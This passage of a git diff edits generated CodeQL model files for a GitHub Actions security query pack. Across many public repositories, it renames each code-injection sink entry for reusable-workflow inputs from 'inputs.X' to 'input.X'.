- ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_pre", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "input.dockerhub_repository", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.timeout", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.docker_push_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index d3cc8e73b70..34d11e19946 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "inputs.constraints", "code-injection", "generated"] - - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "inputs.constraints", "code-injection", "generated"] \ No newline at end of file + - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] + - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index a9f8401aab2..fb4a8248853 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "inputs.job_status", "code-injection", "generated"] \ No newline at end of file + - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index acf43426e56..ef3af44da3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.run", "code-injection", "generated"] - - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.ruby-version", "code-injection", "generated"] \ No newline at end of file + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index 3c9178a9125..a8c86c49d7c 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.latest", "code-injection", "generated"] - - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "inputs.self_hosted", "code-injection", "generated"] \ No newline at end of file + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "input.self_hosted", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 24603c25a77..40549844d38 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.ignore_test_status", "code-injection", "generated"] - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.test_filter", "code-injection", "generated"] - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.browser_filter", "code-injection", "generated"] - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.pr", "code-injection", "generated"] \ No newline at end of file + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.browser_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.pr", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 29f01c24bed..bd180d9b367 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "inputs.package_installation_command", "code-injection", "generated"] \ No newline at end of file + - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index acad489dbe5..1e5721f1e7c 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] + - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index e15b6d33042..b7a14240aed 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "inputs.option", "code-injection", "generated"] \ No newline at end of file + - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 12c9f97b7a4..1a276f8812f 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "inputs.commit", "code-injection", "generated"] \ No newline at end of file + - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 685944420aa..ef448c8f4c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.version", "code-injection", "generated"] - - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 884c3d154ad..6c672170025 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "inputs.verSion", "code-injection", "generated"] - - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "inputs.verSion", "code-injection", "generated"] \ No newline at end of file + - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] + - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 799958a7fee..b7104a8b615 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 32d3e59e1f8..cd81a723906 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.marks", "code-injection", "generated"] - - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.python-version", "code-injection", "generated"] - - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "inputs.dbt-version", "code-injection", "generated"] \ No newline at end of file + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "input.dbt-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index f2893eb2407..1b2ce37480f 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.user", "code-injection", "generated"] - - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file + - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.user", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index ea3b2029f82..91889927c45 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.patch", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.minor", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.major", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.preName", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.pre", "code-injection", "generated"] \ No newline at end of file + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.major", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.preName", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.pre", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 0c542713430..8d4400bd3ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 4c0442abd2b..29c7e1bd3e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["supabase/auth/.github/workflows/publish.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 39c81d39066..109dce9df0d 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "inputs.image", "code-injection", "generated"] \ No newline at end of file + - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index b5d1263f743..e3643f0156b 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index ffb08a8fa2e..a4bba59b5a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.map", "code-injection", "generated"] - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.minor", "code-injection", "generated"] - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.major", "code-injection", "generated"] \ No newline at end of file + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.major", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 4012908e7e9..d12982c35a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "inputs.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file + - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index a1af8280ebc..deb10e5e4b4 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "inputs.target", "code-injection", "generated"] - - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "inputs.manifest_name", "code-injection", "generated"] - - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 84de5681fea..5c22f0ffcb7 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "inputs.asan", "code-injection", "generated"] - - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file + - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] + - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index c9e8b5c23c0..790e94c2aac 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file + - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index 80dde7f2fc0..fedb21393bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "inputs.crate", "code-injection", "generated"] \ No newline at end of file + - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 1ffaa4e1cd0..f60fffb206e 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "inputs.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file + - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index 48b35d83c70..c7fe932aba2 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.framework", "code-injection", "generated"] - - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.configuration", "code-injection", "generated"] \ No newline at end of file + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index e1a0c8a9fcf..d47aea3363f 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "inputs.pytest_markers", "code-injection", "generated"] \ No newline at end of file + - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index 71cd3fed3ed..f32acf5038e 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.pace", "code-injection", "generated"] - - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.next", "code-injection", "generated"] \ No newline at end of file + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index 47f53f495f8..c739b5750cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.server_id", "code-injection", "generated"] - - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.secondary_tests", "code-injection", "generated"] \ No newline at end of file + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 1b592aa91cc..7ac3c0fb530 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "inputs.hz", "code-injection", "generated"] - - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "inputs.hz", "code-injection", "generated"] \ No newline at end of file + - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] + - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index db4e957a87a..c641035f966 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "inputs.workspace", "code-injection", "generated"] \ No newline at end of file + - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index 